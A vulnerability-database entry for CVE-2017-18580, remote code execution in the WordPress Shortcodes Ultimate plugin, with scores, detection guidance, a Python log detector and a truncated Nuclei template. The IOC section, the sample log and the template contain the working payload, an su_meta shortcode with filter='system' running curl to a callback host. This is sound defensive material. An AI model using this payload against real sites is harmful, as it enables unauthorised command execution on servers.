CVE-2017-18580
Published 2019-08-22
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
Priority: P1 (82) · Critical 9.8 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status: exploited in the wild (ITW) · public exploit · VulnCheck KEV
EPSS: 12.09% (95.6th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getshortcodes | shortcodes_ultimate | < 5.0.1 | 5.0.1 |
Detection & IOCs (extracted from sources)
URL: /wp-admin/post.php
Request body: action=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D
URL: /?p={{post_id}}&preview=true
- The exploit uses the [su_meta] shortcode with its filter attribute set to system to achieve RCE. Detect POST requests to /wp-admin/post.php whose body contains filter%3D%27system%27 (URL-encoded) or filter='system' (decoded).
- The vulnerable attribute exists on the su_meta, su_post and su_user shortcodes in shortcodes-ultimate before 5.0.1. Monitor post content for these shortcodes carrying a filter= attribute that names a PHP function (e.g. system, exec, passthru).
- A successful POST to /wp-admin/post.php returns an HTTP 302 whose Location header contains post=; the PoC then issues GET /?p=<id>&preview=true to render the draft, which is when the shortcode (and the filter callback) runs. Correlate the 302 with the subsequent preview GET from the same client and with an outbound DNS/HTTP callback.
- The exploit URL-encodes the shortcode: look for the encoded bracket sequences %5B and %5D wrapping su_meta, su_post or su_user in POST bodies to /wp-admin/post.php.
- Only versions strictly before 5.0.1 are affected; check the installed plugin version, as 5.0.1 and later are patched.
- The Nuclei PoC is authenticated: it extracts a _wpnonce and a post_ID from an editor page before submitting the draft, so the request pattern above comes from a logged-in session that can create or edit posts (NVD nonetheless scores the vector PR:N).
- The PoC confirms execution through an out-of-band DNS/HTTP callback (interactsh). Detection that relies only on the 302/200 response codes will produce false positives, since any ordinary draft save followed by a preview produces the same sequence; the OOB callback, or the command's observed effect, is what gives high confidence.
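The detection notes above, as an added example that is not from the page, the plugin or the Nuclei project: a Python detector that decodes post.php bodies, flags the su_meta/su_post/su_user shortcodes whose filter attribute names a command-execution function, and correlates the 302 with the same client's preview GET. The JSON-lines log format, its field names (ts, src, method, uri, status, location, body) and the sample records are constructed for the example; it does not model the out-of-band callback, so a hit without that callback is a suspected, not a confirmed, exploitation.

```python
"""Detector for the CVE-2017-18580 request pattern over a constructed proxy log.

Added example; not code from the page, the plugin or the Nuclei template.
The log schema and sample records below are assumptions made for the example.
"""
import json
import re
from urllib.parse import parse_qs, urlparse

# Shortcodes the advisory names as carrying the vulnerable 'filter' attribute.
VULN_SHORTCODES = ("su_meta", "su_post", "su_user")
# PHP callbacks that run a command when handed to 'filter'. system, exec and
# passthru are the names the page lists; the rest are further PHP command
# execution functions that deserve the same alert.
DANGEROUS_FILTERS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

SHORTCODE_RE = re.compile(r"\[(" + "|".join(VULN_SHORTCODES) + r")\b([^\]]*)\]", re.I)
FILTER_RE = re.compile(r"""\bfilter\s*=\s*["']?([A-Za-z_][A-Za-z0-9_]*)""", re.I)

# Constructed JSON-lines proxy log (schema is an assumption): one exploit attempt
# followed by its preview fetch, then a benign su_post with a harmless filter.
SAMPLE_LOG = """\
{"ts": 1000, "src": "203.0.113.5", "method": "POST", "uri": "/wp-admin/post.php", "status": 302, "location": "/wp-admin/post.php?post=7&action=edit", "body": "action=editpost&post_ID=7&post_status=draft&post_type=post&_wpnonce=0123abcd&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+oob.example%27+filter%3D%27system%27%5D"}
{"ts": 1001, "src": "203.0.113.5", "method": "GET", "uri": "/?p=7&preview=true", "status": 200, "location": "", "body": ""}
{"ts": 1002, "src": "198.51.100.9", "method": "POST", "uri": "/wp-admin/post.php", "status": 302, "location": "/wp-admin/post.php?post=8&action=edit", "body": "action=editpost&post_ID=8&_wpnonce=ffff&content=%5Bsu_post+field%3D%27post_title%27+filter%3D%27ucfirst%27%5D"}
"""


def load_records(text):
    """Parse JSON lines and order them by timestamp (correlation walks forward in time)."""
    return sorted((json.loads(l) for l in text.splitlines() if l.strip()), key=lambda r: r["ts"])


def find_dangerous_filters(body):
    """Decode a form-encoded post.php body and return (shortcode, filter) pairs
    whose filter attribute names a dangerous PHP function. Works on the
    URL-encoded body the exploit sends and on an already-decoded one."""
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    for content in params.get("content", []):
        for m in SHORTCODE_RE.finditer(content):
            tag, attrs = m.group(1).lower(), m.group(2)
            for f in FILTER_RE.finditer(attrs):
                name = f.group(1).lower()
                if name in DANGEROUS_FILTERS:
                    hits.append((tag, name))
    return hits


def post_id_from_location(location):
    """Pull the draft's id out of the post.php 302 Location header (post=<id>)."""
    return parse_qs(urlparse(location).query).get("post", [None])[0]


def correlate(records, window=300):
    """One alert per post.php POST carrying a dangerous filter. The alert records
    whether the 302 named a post id and whether the same client then fetched
    /?p=<id>&preview=true within `window` seconds (the render that runs the filter)."""
    alerts = []
    for i, r in enumerate(records):
        if r["method"] != "POST" or not r["uri"].startswith("/wp-admin/post.php"):
            continue
        hits = find_dangerous_filters(r.get("body", ""))
        if not hits:
            continue
        pid = post_id_from_location(r.get("location", "")) if r["status"] == 302 else None
        preview = False
        if pid:
            for s in records[i + 1:]:
                if s["ts"] - r["ts"] > window:
                    break
                if s["src"] == r["src"] and s["method"] == "GET":
                    qs = parse_qs(urlparse(s["uri"]).query)
                    if qs.get("p") == [pid] and qs.get("preview") == ["true"]:
                        preview = True
                        break
        alerts.append({"src": r["src"], "post_id": pid, "filters": hits, "preview_fetched": preview})
    return alerts


if __name__ == "__main__":
    print(json.dumps(correlate(load_records(SAMPLE_LOG)), indent=2))
```

Run against the sample, the detector raises a single alert for 203.0.113.5 on post 7 with the preview fetched; the second client's su_post with filter='ucfirst' is ignored because the callback name is not on the dangerous list. Feed it real proxy or WAF records with the same fields, and treat `preview_fetched` as escalation to investigate, with the OOB callback or host-side evidence still needed for confirmation.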
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-83cw-ph9g-5p57 · unreviewed · 2022-05-24 · CVE-2017-18580 · CRITICAL · CWE-20
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
VulnCheck
getshortcodes shortcodes_ultimate Improper Input Validation · vulncheck · 2017 · CVE-2017-18580 · CVSS 9.8 CRITICAL
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
Affected: getshortcodes shortcodes_ultimate
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://wpscan.com/vulnerability/efad59c8-e6ae-4167-9c78-d3ea52fe5bba/
No detection rules found.
Nuclei
WordPress Shortcodes Ultimate <= 5.0.0 - Authenticated Remote Code Execution
nuclei · CVE-2017-18580 · CVSS 9.8 CRITICAL
Template excerpt as indexed on this page. The opening of the template (id, info, the login and editor-page requests) is not on the page, and the final matcher is cut off at `contains(`; only the regex of the nonce extractor survives, so its surrounding keys are laid out to match the post_id extractor that follows it.

```yaml
    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        group: 1
        regex:
          - '\s*<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)"'

      - type: regex
        name: post_id
        part: body
        internal: true
        group: 1
        regex:
          - "id='post_ID' name='post_ID' value='([0-9]+)'"

  - raw:
      - |
        POST /wp-admin/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "post=")
        condition: and
        internal: true

  - raw:
      - |
        GET /?p={{post_id}}&preview=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(
```
No writeups or analysis indexed.